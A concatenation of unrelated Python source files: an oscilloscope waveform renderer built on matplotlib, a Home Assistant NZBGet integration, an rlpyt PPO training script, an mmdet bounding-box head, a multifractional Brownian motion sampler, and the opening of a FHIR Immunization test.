UpdateLines = Callable[[List[RenderInput]], Any]
UpdateOneLine = Callable[[np.ndarray], Any]
@attr.dataclass
class CustomLine:
stride: int
_xdata: np.ndarray = attr.ib(converter=np.array)
@property
def xdata(self) -> np.ndarray:
return self._xdata
@xdata.setter
def xdata(self, value):
self._xdata = np.array(value)
set_xdata: UpdateOneLine
set_ydata: UpdateOneLine
@property
@abstractmethod
def abstract_classvar(self) -> Any:
"""A ClassVar to be overriden by a subclass."""
class _RendererBackend(ABC):
"""
Renderer backend which takes data and produces images.
Does not touch Wave or Channel.
"""
# Class attributes and methods
bytes_per_pixel: int = abstract_classvar
ffmpeg_pixel_format: str = abstract_classvar
@staticmethod
@abstractmethod
def color_to_bytes(c: str) -> np.ndarray:
"""
Returns integer ndarray of length RGB_DEPTH.
This must return ndarray (not bytes or list),
since the caller performs arithmetic on the return value.
Only used for tests/test_renderer.py.
"""
# Instance initializer
def __init__(
self,
cfg: RendererConfig,
lcfg: "LayoutConfig",
dummy_datas: List[np.ndarray],
channel_cfgs: Optional[List["ChannelConfig"]],
channels: List["Channel"],
):
self.cfg = cfg
self.lcfg = lcfg
self.w = cfg.divided_width
self.h = cfg.divided_height
# Maps a continuous variable from 0 to 1 (representing one octave) to a color.
self.pitch_cmap = gen_circular_cmap(cfg.pitch_colors)
self.nplots = len(dummy_datas)
if self.nplots > 0:
assert len(dummy_datas[0].shape) == 2, dummy_datas[0].shape
self.wave_nsamps = [data.shape[0] for data in dummy_datas]
self.wave_nchans = [data.shape[1] for data in dummy_datas]
if channel_cfgs is None:
channel_cfgs = [ChannelConfig("") for _ in range(self.nplots)]
if len(channel_cfgs) != self.nplots:
raise ValueError(
f"cannot assign {len(channel_cfgs)} colors to {self.nplots} plots"
)
self._line_params = [
LineParam(
color=coalesce(ccfg.line_color, cfg.global_line_color),
color_by_pitch=coalesce(ccfg.color_by_pitch, cfg.global_color_by_pitch),
)
for ccfg in channel_cfgs
]
# Load channel strides.
if channels is not None:
if len(channels) != self.nplots:
raise ValueError(
f"cannot assign {len(channels)} channels to {self.nplots} plots"
)
self.render_strides = [channel.render_stride for channel in channels]
else:
self.render_strides = [1] * self.nplots
# Instance functionality
@abstractmethod
def add_lines_stereo(
self, dummy_datas: List[np.ndarray], strides: List[int]
) -> UpdateLines:
...
@abstractmethod
def get_frame(self) -> ByteBuffer:
...
@abstractmethod
def add_labels(self, labels: List[str]) -> Any:
...
# Primarily used by RendererFrontend, not outside world.
@abstractmethod
def _add_xy_line_mono(
self, wave_idx: int, xs: Sequence[float], ys: Sequence[float], stride: int
) -> CustomLine:
...
# See Wave.get_around() and designNotes.md.
# Viewport functions
def calc_limits(N: int, viewport_stride: float) -> Tuple[float, float]:
halfN = N // 2
max_x = N - 1
return np.array([-halfN, -halfN + max_x]) * viewport_stride
def calc_center(viewport_stride: float) -> float:
return -0.5 * viewport_stride
# Line functions
def calc_xs(N: int, stride: int) -> Sequence[float]:
halfN = N // 2
return (np.arange(N) - halfN) * stride
Point = float
Pixel = float
# Matplotlib multiplies all widths by (inch/72 units) (AKA "matplotlib points").
# To simplify code, render output at (72 px/inch), so 1 unit = 1 px.
# For font sizes, convert from font-pt to pixels.
# (Font sizes are used far less than pixel measurements.)
PX_INCH = 72
PIXELS_PER_PT = 96 / 72
def px_from_points(pt: Point) -> Pixel:
return pt * PIXELS_PER_PT
class AbstractMatplotlibRenderer(_RendererBackend, ABC):
"""Matplotlib renderer which can use any backend (agg, mplcairo).
To pick a backend, subclass and set _canvas_type at the class level.
"""
_canvas_type: Type["FigureCanvasBase"] = abstract_classvar
@staticmethod
@abstractmethod
def _canvas_to_bytes(canvas: "FigureCanvasBase") -> ByteBuffer:
pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
dict.__setitem__(
matplotlib.rcParams, "lines.antialiased", self.cfg.antialiasing
)
self._setup_axes(self.wave_nchans)
self._artists: List["Artist"] = []
_fig: "Figure"
# _axes2d[wave][chan] = Axes
# Primary, used to draw oscilloscope lines and gridlines.
_axes2d: List[List["Axes"]] # set by set_layout()
# _axes_mono[wave] = Axes
# Secondary, used for titles and debug plots.
_axes_mono: List["Axes"]
def _setup_axes(self, wave_nchans: List[int]) -> None:
"""
Creates a flat array of Matplotlib Axes, with the new layout.
Sets up each Axes with correct region limits.
"""
self.layout = RendererLayout(self.lcfg, wave_nchans)
self.layout_mono = RendererLayout(self.lcfg, [1] * self.nplots)
if hasattr(self, "_fig"):
raise Exception("I don't currently expect to call _setup_axes() twice")
# plt.close(self.fig)
cfg = self.cfg
self._fig = Figure()
self._canvas_type(self._fig)
px_inch = PX_INCH / cfg.res_divisor
self._fig.set_dpi(px_inch)
"""
Requirements:
- px_inch /= res_divisor (to scale visual elements correctly)
- int(set_size_inches * px_inch) == self.w,h
- matplotlib uses int instead of round. Who knows why.
- round(set_size_inches * px_inch) == self.w,h
- just in case matplotlib changes its mind
Solution:
- (set_size_inches * px_inch) == self.w,h + 0.25
- set_size_inches == (self.w,h + 0.25) / px_inch
"""
offset = 0.25
self._fig.set_size_inches(
(self.w + offset) / px_inch, (self.h + offset) / px_inch
)
real_dims = self._fig.canvas.get_width_height()
assert (self.w, self.h) == real_dims, [(self.w, self.h), real_dims]
# Setup background
self._fig.set_facecolor(cfg.bg_color)
# Create Axes (using self.lcfg, wave_nchans)
# _axes2d[wave][chan] = Axes
self._axes2d = self.layout.arrange(self._axes_factory)
"""
Adding an axes using the same arguments as a previous axes
currently reuses the earlier instance.
In a future version, a new instance will always be created and returned.
Meanwhile, this warning can be suppressed, and the future behavior ensured,
by passing a unique label to each axes instance.
ax=fig.add_axes(label=) is unused, even if you call ax.legend().
"""
# _axes_mono[wave] = Axes
self._axes_mono = []
# Returns 2D list of [self.nplots][1]Axes.
axes_mono_2d = self.layout_mono.arrange(self._axes_factory, label="mono")
for axes_list in axes_mono_2d:
(axes,) = axes_list # type: Axes
# List of colors at
# https://matplotlib.org/gallery/color/colormap_reference.html
# Discussion at https://github.com/matplotlib/matplotlib/issues/10840
cmap: ListedColormap = matplotlib.cm.get_cmap("Accent")
colors = cmap.colors
axes.set_prop_cycle(color=colors)
self._axes_mono.append(axes)
# Setup axes
for idx, N in enumerate(self.wave_nsamps):
wave_axes = self._axes2d[idx]
viewport_stride = self.render_strides[idx] * cfg.viewport_width
ylim = cfg.viewport_height
def scale_axes(ax: "Axes"):
xlim = calc_limits(N, viewport_stride)
ax.set_xlim(*xlim)
ax.set_ylim(-ylim, ylim)
scale_axes(self._axes_mono[idx])
for ax in unique_by_id(wave_axes):
scale_axes(ax)
# Setup midlines (depends on max_x and wave_data)
midline_color = cfg.midline_color
midline_width = cfg.grid_line_width
# Not quite sure if midlines or gridlines draw on top
kw = dict(color=midline_color, linewidth=midline_width)
if cfg.v_midline:
ax.axvline(x=calc_center(viewport_stride), **kw)
if cfg.h_midline:
ax.axhline(y=0, **kw)
self._save_background()
transparent = "#00000000"
# satisfies RegionFactory
def _axes_factory(self, r: RegionSpec, label: str = "") -> "Axes":
cfg = self.cfg
width = 1 / r.ncol
left = r.col / r.ncol
assert 0 <= left < 1
height = 1 / r.nrow
bottom = (r.nrow - r.row - 1) / r.nrow
assert 0 <= bottom < 1
# Disabling xticks/yticks is unnecessary, since we hide Axises.
ax = self._fig.add_axes(
[left, bottom, width, height], xticks=[], yticks=[], label=label
)
grid_color = cfg.grid_color
if grid_color:
# Initialize borders
# Hide Axises
# (drawing them is very slow, and we disable ticks+labels anyway)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Background color
# ax.patch.set_fill(False) sets _fill=False,
# then calls _set_facecolor(...) "alpha = self._alpha if self._fill else 0".
# It is no faster than below.
ax.set_facecolor(self.transparent)
# Set border colors
for spine in ax.spines.values(): # type: Spine
spine.set_linewidth(cfg.grid_line_width)
spine.set_color(grid_color)
def hide(key: str):
ax.spines[key].set_visible(False)
# Hide all axes except bottom-right.
hide("top")
hide("left")
# If bottom of screen, hide bottom. If right of screen, hide right.
if r.screen_edges & Edges.Bottom:
hide("bottom")
if r.screen_edges & Edges.Right:
hide("right")
# Dim stereo gridlines
if cfg.stereo_grid_opacity > 0:
dim_color = matplotlib.colors.to_rgba_array(grid_color)[0]
dim_color[-1] = cfg.stereo_grid_opacity
def dim(key: str):
ax.spines[key].set_color(dim_color)
else:
dim = hide
# If not bottom of wave, dim bottom. If not right of wave, dim right.
if not r.wave_edges & Edges.Bottom:
dim("bottom")
if not r.wave_edges & Edges.Right:
dim("right")
else:
ax.set_axis_off()
return ax
# Public API
def add_lines_stereo(
self, dummy_datas: List[np.ndarray], strides: List[int]
) -> UpdateLines:
cfg = self.cfg
# Plot lines over background
line_width = cfg.line_width
# Foreach wave, plot dummy data.
lines2d = []
for wave_idx, wave_data in enumerate(dummy_datas):
wave_zeros = np.zeros_like(wave_data)
wave_axes = self._axes2d[wave_idx]
wave_lines = []
xs = calc_xs(len(wave_zeros), strides[wave_idx])
# Foreach chan
for chan_idx, chan_zeros in enumerate(wave_zeros.T):
ax = wave_axes[chan_idx]
line_color = self._line_params[wave_idx].color
chan_line: Line2D = ax.plot(
xs, chan_zeros, color=line_color, linewidth=line_width
)[0]
wave_lines.append(chan_line)
lines2d.append(wave_lines)
self._artists.extend(wave_lines)
return lambda datas: self._update_lines_stereo(lines2d, datas)
def _update_lines_stereo(
self, lines2d: "List[List[Line2D]]", inputs: List[RenderInput]
) -> None:
"""
Preconditions:
- lines2d[wave][chan] = Line2D
- inputs[wave] = ndarray, [samp][chan] = FLOAT
"""
nplots = len(lines2d)
ndata = len(inputs)
if nplots != ndata:
raise ValueError(
f"incorrect data to plot: {nplots} plots but {ndata} dummy_datas"
)
# Draw waveform data
# Foreach wave
for wave_idx, input in enumerate(inputs):
wave_data = input.data
freq_estimate = input.freq_estimate
wave_lines = lines2d[wave_idx]
color_by_pitch = self._line_params[wave_idx].color_by_pitch
# If we color notes by pitch, then on every frame,
# recompute the color based on current pitch.
# If no sound is detected, fall back to the default color.
# If we don't color notes by pitch,
# just keep the initial color and never overwrite it.
if color_by_pitch:
fallback_color = self._line_params[wave_idx].color
color = freq_to_color(self.pitch_cmap, freq_estimate, fallback_color)
# Foreach chan
for chan_idx, chan_data in enumerate(wave_data.T):
chan_line = wave_lines[chan_idx]
chan_line.set_ydata(chan_data)
if color_by_pitch:
chan_line.set_color(color)
def _add_xy_line_mono(
self, wave_idx: int, xs: Sequence[float], ys: Sequence[float], stride: int
) -> CustomLine:
cfg = self.cfg
# Plot lines over background
line_width = cfg.line_width
ax = self._axes_mono[wave_idx]
mono_line: Line2D = ax.plot(xs, ys, linewidth=line_width)[0]
self._artists.append(mono_line)
# noinspection PyTypeChecker
return CustomLine(stride, xs, mono_line.set_xdata, mono_line.set_ydata)
# Channel labels
def add_labels(self, labels: List[str]) -> List["Text"]:
"""
Updates background, adds text.
Do NOT call after calling self.add_lines().
"""
nlabel = len(labels)
if nlabel != self.nplots:
raise ValueError(
f"incorrect labels: {self.nplots} plots but {nlabel} labels"
)
cfg = self.cfg
color = cfg.get_label_color
size_pt = cfg.label_font.size
distance_px = cfg.label_padding_ratio * size_pt
@attr.dataclass
class AxisPosition:
pos_axes: float
offset_px: float
align: str
xpos = cfg.label_position.x.match(
left=AxisPosition(0, distance_px, "left"),
right=AxisPosition(1, -distance_px, "right"),
)
ypos = cfg.label_position.y.match(
bottom=AxisPosition(0, distance_px, "bottom"),
top=AxisPosition(1, -distance_px, "top"),
)
pos_axes = (xpos.pos_axes, ypos.pos_axes)
offset_pt = (xpos.offset_px, ypos.offset_px)
out: List["Text"] = []
for label_text, ax in zip(labels, self._axes_mono):
# https://matplotlib.org/api/_as_gen/matplotlib.axes.Axes.annotate.html
# Annotation subclasses Text.
text: "Annotation" = ax.annotate(
label_text,
# Positioning
xy=pos_axes,
xycoords="axes fraction",
xytext=offset_pt,
textcoords="offset points",
horizontalalignment=xpos.align,
verticalalignment=ypos.align,
# Cosmetics
color=color,
fontsize=px_from_points(size_pt),
fontfamily=cfg.label_font.family,
fontweight=("bold" if cfg.label_font.bold else "normal"),
fontstyle=("italic" if cfg.label_font.italic else "normal"),
)
out.append(text)
self._save_background()
return out
# Output frames
def get_frame(self) -> ByteBuffer:
"""Returns bytes with shape (h, w, self.bytes_per_pixel).
The actual return value's shape may be flat.
"""
self._redraw_over_background()
canvas = self._fig.canvas
# Agg is the default noninteractive backend except on OSX.
# https://matplotlib.org/faq/usage_faq.html
if not isinstance(canvas, self._canvas_type):
raise RuntimeError(
f"oh shit, cannot read data from {obj_name(canvas)} != {self._canvas_type.__name__}"
)
buffer_rgb = self._canvas_to_bytes(canvas)
assert len(buffer_rgb) == self.w * self.h * self.bytes_per_pixel
return buffer_rgb
# Pre-rendered background
bg_cache: Any # "matplotlib.backends._backend_agg.BufferRegion"
def _save_background(self) -> None:
"""Draw static background."""
# https://stackoverflow.com/a/8956211
# https://matplotlib.org/api/animation_api.html#funcanimation
fig = self._fig
fig.canvas.draw()
self.bg_cache = fig.canvas.copy_from_bbox(fig.bbox)
def _redraw_over_background(self) -> None:
"""Redraw animated elements of the image."""
# Both FigureCanvasAgg and FigureCanvasCairo, but not FigureCanvasBase,
# support restore_region().
canvas: FigureCanvasAgg = self._fig.canvas
canvas.restore_region(self.bg_cache)
for artist in self._artists:
artist.axes.draw_artist(artist)
# canvas.blit(self._fig.bbox) is unnecessary when drawing off-screen.
class MatplotlibAggRenderer(AbstractMatplotlibRenderer):
# implements AbstractMatplotlibRenderer
_canvas_type = FigureCanvasAgg
@staticmethod
def _canvas_to_bytes(canvas: FigureCanvasAgg) -> ByteBuffer:
# In matplotlib >= 3.1, canvas.buffer_rgba() returns a zero-copy memoryview.
# This is faster to print to screen than the previous bytes.
# Also the APIs are incompatible.
# Flatten all dimensions of the memoryview.
return canvas.buffer_rgba().cast("B")
# Implements _RendererBackend.
bytes_per_pixel = 4
ffmpeg_pixel_format = "rgb0"
@staticmethod
def color_to_bytes(c: str) -> np.ndarray:
from matplotlib.colors import to_rgba
return np.array([round(c * 255) for c in to_rgba(c)], dtype=int)
# TODO: PlotConfig
# - align: left vs mid
# - shift/offset: bool
# - invert if trigger is negative: bool
class RendererFrontend(_RendererBackend, ABC):
"""Wrapper around _RendererBackend implementations, providing a better interface."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._update_main_lines = None
self._custom_lines = {} # type: Dict[Any, CustomLine]
self._vlines = {} # type: Dict[Any, CustomLine]
self._offsetable = defaultdict(list)
# Overrides implementations of _RendererBackend.
def get_frame(self) -> ByteBuffer:
out = super().get_frame()
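        # Zero out the custom/debug overlay lines after rendering, so they do not
        # persist into the next frame unless they are explicitly updated again.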
for line in self._custom_lines.values():
line.set_ydata(0 * line.xdata)
for line in self._vlines.values():
line.set_xdata(0 * line.xdata)
return out
# New methods.
_update_main_lines: Optional[UpdateLines]
def update_main_lines(self, inputs: List[RenderInput]) -> None:
datas = [input.data for input in inputs]
if self._update_main_lines is None:
self._update_main_lines = self.add_lines_stereo(datas, self.render_strides)
self._update_main_lines(inputs)
_offsetable: DefaultDict[int, MutableSequence[CustomLine]]
def update_custom_line(
self,
name: str,
wave_idx: int,
stride: int,
data: np.ndarray,
*,
offset: bool = True,
):
data = data.copy()
key = (name, wave_idx)
if key not in self._custom_lines:
line = self._add_line_mono(wave_idx, stride, data)
self._custom_lines[key] = line
if offset:
self._offsetable[wave_idx].append(line)
else:
line = self._custom_lines[key]
line.set_ydata(data)
def update_vline(
self, name: str, wave_idx: int, stride: int, x: int, *, offset: bool = True
):
key = (name, wave_idx)
if key not in self._vlines:
line = self._add_vline_mono(wave_idx, stride)
self._vlines[key] = line
if offset:
self._offsetable[wave_idx].append(line)
else:
line = self._vlines[key]
line.xdata = [x * stride] * 2
line.set_xdata(line.xdata)
def offset_viewport(self, wave_idx: int, viewport_offset: float):
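        # Shift registered overlay lines opposite to the viewport offset (scaled by
        # each line's stride) so they stay aligned with the scrolled waveform.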
line_offset = -viewport_offset
for line in self._offsetable[wave_idx]:
line.set_xdata(line.xdata + line_offset * line.stride)
def _add_line_mono(
self, wave_idx: int, stride: int, dummy_data: np.ndarray
) -> CustomLine:
ys = np.zeros_like(dummy_data)
xs = calc_xs(len(ys), stride)
return self._add_xy_line_mono(wave_idx, xs, ys, stride)
def _add_vline_mono(self, wave_idx: int, stride: int) -> CustomLine:
return self._add_xy_line_mono(wave_idx, [0, 0], [-1, 1], stride)
class Renderer(RendererFrontend, MatplotlibAggRenderer):
pass
|
homeassistant/components/nzbget/__init__.py
|
andersop91/core
| 22,481 |
128885
|
"""The NZBGet integration."""
import voluptuous as vol
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_SCAN_INTERVAL,
CONF_SSL,
CONF_USERNAME,
Platform,
)
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import (
ATTR_SPEED,
DATA_COORDINATOR,
DATA_UNDO_UPDATE_LISTENER,
DEFAULT_NAME,
DEFAULT_PORT,
DEFAULT_SCAN_INTERVAL,
DEFAULT_SPEED_LIMIT,
DEFAULT_SSL,
DOMAIN,
SERVICE_PAUSE,
SERVICE_RESUME,
SERVICE_SET_SPEED,
)
from .coordinator import NZBGetDataUpdateCoordinator
PLATFORMS = [Platform.SENSOR, Platform.SWITCH]
CONFIG_SCHEMA = vol.Schema(
vol.All(
cv.deprecated(DOMAIN),
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(
CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL
): cv.time_period,
vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
}
)
},
),
extra=vol.ALLOW_EXTRA,
)
SPEED_LIMIT_SCHEMA = vol.Schema(
{vol.Optional(ATTR_SPEED, default=DEFAULT_SPEED_LIMIT): cv.positive_int}
)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the NZBGet integration."""
hass.data.setdefault(DOMAIN, {})
if hass.config_entries.async_entries(DOMAIN):
return True
if DOMAIN in config:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=config[DOMAIN],
)
)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up NZBGet from a config entry."""
if not entry.options:
options = {
CONF_SCAN_INTERVAL: entry.data.get(
CONF_SCAN_INTERVAL, DEFAULT_SCAN_INTERVAL
),
}
hass.config_entries.async_update_entry(entry, options=options)
coordinator = NZBGetDataUpdateCoordinator(
hass,
config=entry.data,
options=entry.options,
)
await coordinator.async_config_entry_first_refresh()
undo_listener = entry.add_update_listener(_async_update_listener)
hass.data[DOMAIN][entry.entry_id] = {
DATA_COORDINATOR: coordinator,
DATA_UNDO_UPDATE_LISTENER: undo_listener,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
_async_register_services(hass, coordinator)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN][entry.entry_id][DATA_UNDO_UPDATE_LISTENER]()
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
def _async_register_services(
hass: HomeAssistant,
coordinator: NZBGetDataUpdateCoordinator,
) -> None:
"""Register integration-level services."""
def pause(call: ServiceCall) -> None:
"""Service call to pause downloads in NZBGet."""
coordinator.nzbget.pausedownload()
def resume(call: ServiceCall) -> None:
"""Service call to resume downloads in NZBGet."""
coordinator.nzbget.resumedownload()
def set_speed(call: ServiceCall) -> None:
"""Service call to rate limit speeds in NZBGet."""
coordinator.nzbget.rate(call.data[ATTR_SPEED])
hass.services.async_register(DOMAIN, SERVICE_PAUSE, pause, schema=vol.Schema({}))
hass.services.async_register(DOMAIN, SERVICE_RESUME, resume, schema=vol.Schema({}))
hass.services.async_register(
DOMAIN, SERVICE_SET_SPEED, set_speed, schema=SPEED_LIMIT_SCHEMA
)
async def _async_update_listener(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Handle options update."""
await hass.config_entries.async_reload(entry.entry_id)
class NZBGetEntity(CoordinatorEntity):
"""Defines a base NZBGet entity."""
def __init__(
self, *, entry_id: str, name: str, coordinator: NZBGetDataUpdateCoordinator
) -> None:
"""Initialize the NZBGet entity."""
super().__init__(coordinator)
self._name = name
self._entry_id = entry_id
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._name
|
rlpyt/ul/experiments/rl_from_ul/scripts/atari/train/atari_ppo_from_ul_serial.py
|
wingbender/rlpyt
| 2,122 |
128899
|
import sys
import pprint
import os.path as osp
from rlpyt.utils.launching.affinity import affinity_from_code
from rlpyt.samplers.serial.sampler import SerialSampler
from rlpyt.samplers.parallel.cpu.collectors import CpuResetCollector
from rlpyt.envs.atari.atari_env import AtariTrajInfo
from rlpyt.ul.envs.atari import AtariEnv84
from rlpyt.algos.pg.ppo import PPO
# from rlpyt.agents.dqn.atari.atari_dqn_agent import AtariDqnAgent
# from rlpyt.ul.agents.atari_dqn_rl_from_ul_agent import AtariDqnRlFromUlAgent
from rlpyt.ul.agents.atari_pg_agent import AtariPgAgent
from rlpyt.runners.minibatch_rl import MinibatchRl
from rlpyt.utils.logging.context import logger_context
from rlpyt.utils.launching.variant import load_variant, update_config
from rlpyt.ul.experiments.rl_from_ul.configs.atari_ppo_from_ul import configs
def build_and_train(
slot_affinity_code="0slt_1gpu_1cpu",
log_dir="test",
run_ID="0",
config_key="ppo_16env",
experiment_title="exp",
):
affinity = affinity_from_code(slot_affinity_code)
config = configs[config_key]
variant = load_variant(log_dir)
config = update_config(config, variant)
    # Hack so that the first part of the log_dir matches the source of the model
model_base_dir = config["pretrain"]["model_dir"]
if model_base_dir is not None:
raw_log_dir = log_dir.split(experiment_title)[-1].lstrip("/") # get rid of ~/GitRepos/adam/rlpyt/data/local/<timestamp>/
model_sub_dir = raw_log_dir.split("/RlFromUl/")[0] # keep the UL part, which comes first
config["agent"]["state_dict_filename"] = osp.join(model_base_dir,
model_sub_dir, "run_0/params.pkl")
pprint.pprint(config)
sampler = SerialSampler(
EnvCls=AtariEnv84,
env_kwargs=config["env"],
CollectorCls=CpuResetCollector,
TrajInfoCls=AtariTrajInfo,
eval_env_kwargs=config["env"], # Same args!
**config["sampler"]
)
algo = PPO(optim_kwargs=config["optim"], **config["algo"])
agent = AtariPgAgent(model_kwargs=config["model"], **config["agent"])
runner = MinibatchRl(
algo=algo,
agent=agent,
sampler=sampler,
affinity=affinity,
**config["runner"]
)
name = config["env"]["game"]
with logger_context(log_dir, run_ID, name, config):
runner.train()
if __name__ == "__main__":
build_and_train(*sys.argv[1:])
|
mmdet/models/bbox_heads/DCM_bbox_head.py
|
ydiller/BalancedGroupSoftmax
| 333 |
128926
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import pickle
from mmdet.core import (delta2bbox, force_fp32,
multiclass_nms)
from .convfc_bbox_head import SharedFCBBoxHead
from ..builder import build_loss
from ..registry import HEADS
from ..losses import accuracy
@HEADS.register_module
class DCMBBoxHead(SharedFCBBoxHead):
def __init__(self,
num_fcs=2,
fc_out_channels=1024,
*args,
**kwargs):
super(DCMBBoxHead, self).__init__(num_fcs=num_fcs,
fc_out_channels=fc_out_channels,
*args, **kwargs)
def forward(self, x):
# shared part
if self.num_shared_convs > 0:
for conv in self.shared_convs:
x = conv(x)
if self.num_shared_fcs > 0:
if self.with_avg_pool:
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
for fc in self.shared_fcs:
before_relu = fc(x)
x = self.relu(before_relu)
# separate branches
x_cls = x
x_reg = x
cls_score = self.fc_cls(x_cls) if self.with_cls else None
bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
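        # Besides the usual classification/regression outputs, the pre-ReLU features
        # of the last shared FC ("before_relu") are returned as well -- presumably for
        # the DCM calibration performed elsewhere. Note this assumes num_shared_fcs > 0,
        # otherwise "before_relu" is never assigned.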
return cls_score, bbox_pred, before_relu
@force_fp32(apply_to=('cls_score', 'bbox_pred'))
def get_det_bboxes(self,
rois,
cls_score,
bbox_pred,
img_shape,
scale_factor,
rescale=False,
cfg=None):
# if isinstance(cls_score, list):
# cls_score = sum(cls_score) / float(len(cls_score))
# scores = F.softmax(cls_score, dim=1) if cls_score is not None else None
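        # Unlike the parent head, no softmax is applied here: the raw class scores are
        # used directly (presumably already calibrated by the DCM procedure).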
scores = cls_score
if bbox_pred is not None:
bboxes = delta2bbox(rois[:, 1:], bbox_pred, self.target_means,
self.target_stds, img_shape)
else:
bboxes = rois[:, 1:].clone()
if img_shape is not None:
bboxes[:, [0, 2]].clamp_(min=0, max=img_shape[1] - 1)
bboxes[:, [1, 3]].clamp_(min=0, max=img_shape[0] - 1)
if rescale:
if isinstance(scale_factor, float):
bboxes /= scale_factor
else:
bboxes /= torch.from_numpy(scale_factor).to(bboxes.device)
if cfg is None:
return bboxes, scores
else:
det_bboxes, det_labels = multiclass_nms(bboxes, scores,
cfg.score_thr, cfg.nms,
cfg.max_per_img)
return det_bboxes, det_labels
|
stochastic/processes/continuous/multifractional_brownian_motion.py
|
zaczw/stochastic
| 268 |
128939
|
"""Multifractional Brownian motion."""
import inspect
import numpy as np
from scipy.special import gamma
from stochastic.processes.base import BaseTimeProcess
class MultifractionalBrownianMotion(BaseTimeProcess):
r"""Multifractional Brownian motion process.
.. image:: _static/multifractional_brownian_motion.png
:scale: 50%
A multifractional Brownian motion generalizes a fractional Brownian
motion with a Hurst parameter which is a function of time,
:math:`h(t)`. If the Hurst is constant, the process is a fractional
Brownian motion. If Hurst is constant equal to 0.5, the process is a
Brownian motion.
Approximate method originally proposed for fBm in
* <NAME>, and <NAME>. "An accurate fractional Brownian
motion generator." Physica A: Statistical Mechanics and its Applications
208, no. 1 (1994): 21-30.
Adapted to approximate mBm in
* <NAME>., and <NAME>. "Modeling of locally self-similar
processes using multifractional Brownian motion of Riemann-Liouville
type." Physical Review E 63, no. 4 (2001): 046104.
:param float hurst: a callable with one argument :math:`h(t)` such that
:math:`h(t') \in (0, 1) \forall t' \in [0, t]`. Default is
:math:`h(t) = 0.5`.
:param float t: the right hand endpoint of the time interval :math:`[0,t]`
for the process
:param numpy.random.Generator rng: a custom random number generator
"""
def __init__(self, hurst=None, t=1, rng=None):
super().__init__(t=t, rng=rng)
self.hurst = hurst if hurst is not None else lambda x: 0.5
self._n = None
def __str__(self):
return "Multifractional Brownian motion with Hurst function " + "{h} on [0, {t}].".format(
t=str(self.t), h=self.hurst.__name__
)
def __repr__(self):
return "FractionalBrownianMotion(hurst={h}, t={t})".format(t=str(self.t), h=self.hurst.__name__)
@property
def hurst(self):
"""Hurst function."""
return self._hurst
@hurst.setter
def hurst(self, value):
try:
num_args = len(inspect.signature(value).parameters)
except Exception:
raise ValueError("Hurst parameter must be a function of one argument.")
if not callable(value) or num_args != 1:
raise ValueError("Hurst parameter must be a function of one argument.")
self._hurst = value
self._changed = True
def _check_hurst(self, value):
self._hs = [value(t) for t in self.times(self._n)]
for h in self._hs:
if h <= 0 or h >= 1:
raise ValueError("Hurst range must be on interval (0, 1).")
def _sample_multifractional_brownian_motion(self, n):
"""Generate Riemann-Liouville mBm."""
gn = self.rng.normal(0.0, 1.0, n)
self._set_times(n)
self._dt = 1.0 * self.t / self._n
self._check_hurst(self.hurst)
mbm = [0]
coefs = [(g / np.sqrt(self._dt)) * self._dt for g in gn]
for k in range(1, self._n + 1):
weights = [self._w(t, self._hs[k]) for t in self._times[1 : k + 1]]
seq = [coefs[i - 1] * weights[k - i] for i in range(1, k + 1)]
mbm.append(sum(seq))
return np.array(mbm)
def sample(self, n):
"""Generate a realization.
:param int n: the number of increments to generate
"""
return self._sample_multifractional_brownian_motion(n)
def _w(self, t, hurst):
"""Get the Riemann-Liouville method weight for time t."""
w = (
1.0
/ gamma(hurst + 0.5)
* np.sqrt((t ** (2 * hurst) - (t - self._dt) ** (2 * hurst)) / (2 * hurst * self._dt))
)
return w
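# Usage sketch (not part of the library): a minimal example relying only on the
# public API above (__init__ and sample()) and on the BaseTimeProcess plumbing
# used inside sample(); the Hurst callable must stay inside (0, 1) over [0, t].
if __name__ == "__main__":
    def drifting_hurst(t):
        """Hurst exponent drifting from rough (0.3) towards smoother (0.7)."""
        return 0.3 + 0.4 * t
    mbm = MultifractionalBrownianMotion(hurst=drifting_hurst, t=1)
    path = mbm.sample(250)
    print(len(path))  # 251: the path starts at 0 and adds one point per increment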
|
fhir/resources/DSTU2/tests/test_immunization.py
|
cstoltze/fhir.resources
| 144 |
128964
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Immunization
Release: DSTU2
Version: 1.0.2
Revision: 7202
"""
from .. import fhirtypes # noqa: F401
from .. import immunization
def testImmunization1(base_settings):
filename = base_settings["unittest_data_dir"] / "immunization-example-refused.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_Immunization_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_Immunization_1(inst2)
def impl_Immunization_1(inst):
